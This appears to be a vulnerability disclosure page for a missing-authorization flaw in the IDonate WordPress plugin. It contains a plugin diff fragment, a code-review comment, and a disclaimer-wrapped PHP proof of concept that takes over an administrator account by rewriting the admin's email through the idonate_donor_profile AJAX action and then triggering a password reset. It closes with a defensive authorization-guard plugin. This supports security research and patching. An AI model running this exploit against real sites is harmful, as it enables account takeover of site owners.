+								'title'   => esc_html__('Icon Shape', 'idonate'),
+								'options' => array(
+									'idonate_circle'    => array(
+										'image'       => IDONATE_ASSETS . 'images/circle-icon.png',
+										'text' => esc_html__('Circle', 'idonate'),
+									),
+									'idonate_rounded'   => array(
+										'image'       => IDONATE_ASSETS . 'images/round-icon.png',
+										'text' => esc_html__('Rounded', 'idonate'),
+									),
+									'idonate_square'    => array(
+										'image'       => IDONATE_ASSETS . 'images/square-icon.png',
+										'text' => esc_html__('Square', 'idonate'),
+									),
+									'icon_only' => array(
+										'image'       => IDONATE_ASSETS . 'images/only-icon.png',
+										'text' => esc_html__('Icon only', 'idonate'),
+									),
+								),
+								'default' => 'idonate_circle',
+							),
+							array(
+								'id'      => 'social_icon_custom_color',
+								'type'    => 'checkbox',
+								'title'   => esc_html__('Custom Color', 'idonate'),
+								'default' => false,
+							),
+							array(
+								'id'      => 'social_icon_color',
+								'type'    => 'color_group',
+								'title'   => esc_html__('Icon Color', 'idonate'),
+								'options' => array(
+									'icon_color'       => esc_html__('Icon', 'idonate'),
+									'icon_hover_color' => esc_html__('Icon Hover', 'idonate'),
+					
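Review bot: Several strings in the added file use misspelled text domains: 'idonat-pro' on the Color Settings title and 'idoante-pro' on its description and on all three idonate_recapthca_label strings, while the rest of the file uses 'idonate'. Those strings will never match a loaded translation; use 'idonate' throughout. The file and class docblocks still read "Custom CSS settings tab" although the class is IDonateSettings and the section is GENERAL, so the copy-pasted comment should be corrected. The idonate_recaptcha_secretkey field is also declared as a plain 'text' type, which renders the secret in clear on the settings page. Finally, the visible portion of this hunk is settings definitions only and contains no capability or ownership check, so the fix for idonate_donor_profile has to be verified in the DonorFunctions.php hunk, not here.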

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-4521 - IDonate 2.1.5 - 2.1.9 - Missing Authorization to Authenticated (Subscriber+) Account Takeover/Privilege Escalation via idonate_donor_profile Function

$target_url = "https://vulnerable-site.com"; // Change to target WordPress site
$username = "attacker"; // Subscriber-level username
$password = "password"; // Subscriber-level password
$admin_donor_id = 1; // Target administrator donor ID
$attacker_email = "attacker@example.com"; // Email attacker controls

// Step 1: Authenticate to WordPress
$login_url = $target_url . "/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login page to retrieve nonce
$response = curl_exec($ch);
preg_match('/name="log"[^>]+value="([^"]*)"/', $response, $log_match);
preg_match('/name="pwd"[^>]+value="([^"]*)"/', $response, $pwd_match);

// Perform login
$post_fields = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Step 2: Exploit missing authorization in idonate_donor_profile function
$ajax_url = $target_url . "/wp-admin/admin-ajax.php";
$exploit_data = array(
    'action' => 'idonate_donor_profile',
    'donor_id' => $admin_donor_id, // Target administrator's donor ID
    'email' => $attacker_email, // Replace admin email with attacker's email
    'first_name' => 'Admin', // Maintain original first name
    'last_name' => 'User', // Maintain original last name
    'phone' => '1234567890', // Example phone number
    'blood_group' => 'A+', // Example blood group
    'country' => 'US', // Example country
    'state' => 'California', // Example state
    'city' => 'Los Angeles', // Example city
    'address' => '123 Main St', // Example address
    'zip_code' => '90001', // Example zip code
    'gender' => 'male', // Example gender
    'date_of_birth' => '1990-01-01', // Example date of birth
    'last_donation_date' => '2024-01-01' // Example last donation date
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$exploit_response = curl_exec($ch);

// Check if exploit succeeded
if (strpos($exploit_response, 'success') !== false || strpos($exploit_response, 'updated') !== false) {
    echo "[+] Successfully updated administrator email to attacker-controlled email.\n";
    echo "[+] Now trigger password reset for email: " . $attacker_email . "\n";
    
    // Step 3: Trigger password reset for the compromised email
    $reset_url = $target_url . "/wp-login.php?action=lostpassword";
    curl_setopt($ch, CURLOPT_URL, $reset_url);
    curl_setopt($ch, CURLOPT_POST, false);
    $reset_page = curl_exec($ch);
    
    // Extract nonce from reset page
    preg_match('/name="wpnonce" value="([^"]+)"/', $reset_page, $nonce_match);
    $wpnonce = isset($nonce_match[1]) ? $nonce_match[1] : '';
    
    // Submit password reset request
    $reset_data = array(
        'user_login' => $attacker_email,
        'wpnonce' => $wpnonce,
        'redirect_to' => '',
        'wp-submit' => 'Get New Password'
    );
    
    curl_setopt($ch, CURLOPT_URL, $reset_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($reset_data));
    $reset_response = curl_exec($ch);
    
    if (strpos($reset_response, 'Check your email') !== false || strpos($reset_response, 'password reset') !== false) {
        echo "[+] Password reset initiated. Check email at " . $attacker_email . " to complete account takeover.\n";
    } else {
        echo "[-] Password reset may have failed. Manual reset required.\n";
    }
} else {
    echo "[-] Exploit failed. Response: " . $exploit_response . "\n";
}

curl_close($ch);

?>
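
The defensive counterpart to the request above, as an added example that is not taken from the plugin or its patch: a must-use plugin that hooks the same AJAX action ahead of the plugin's handler and enforces the missing authorization check. It assumes donor_id is a WordPress user ID (as the PoC implies) and that the plugin's handler is registered at the default priority; the file name and function name are hypothetical.

```php
<?php
/**
 * Plugin Name: IDonate donor-profile authorization guard (added example)
 *
 * Hypothetical must-use plugin, e.g. wp-content/mu-plugins/idonate-authz-guard.php.
 * Not part of IDonate or its patch. Assumes donor_id is a WordPress user ID
 * and that the plugin's handler is hooked at the default priority (10).
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Refuse direct access outside WordPress.
}

/**
 * Deny donor profile updates aimed at an account the caller may not edit.
 * Hypothetical function name.
 */
function idonate_authz_guard_check() {
	// The page describes a POST request; the query string is checked as
	// well in case the handler reads $_REQUEST.
	foreach ( array( $_GET, $_POST ) as $params ) {
		if ( ! isset( $params['donor_id'] ) ) {
			continue;
		}
		$raw      = wp_unslash( $params['donor_id'] );
		$donor_id = is_scalar( $raw ) ? absint( $raw ) : 0;

		// Arrays and non-numeric values have no legitimate target.
		if ( 0 === $donor_id ) {
			wp_send_json_error( array( 'message' => 'Invalid donor_id.' ), 400 );
		}

		// 'edit_user' is a core meta capability: granted for the caller's
		// own account, otherwise it requires 'edit_users'.
		if ( ! current_user_can( 'edit_user', $donor_id ) ) {
			error_log( sprintf(
				'idonate_donor_profile denied: user %d, donor_id %d',
				get_current_user_id(),
				$donor_id
			) );
			wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
		}
	}
	// All supplied IDs are authorized: fall through to the plugin's handler.
}

// Priority 0 runs before handlers registered at the default priority.
add_action( 'wp_ajax_idonate_donor_profile', 'idonate_authz_guard_check', 0 );
```

The denial lines written by error_log() double as a detection signal for attempted cross-account edits. The guard is a stopgap until the plugin itself is updated.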
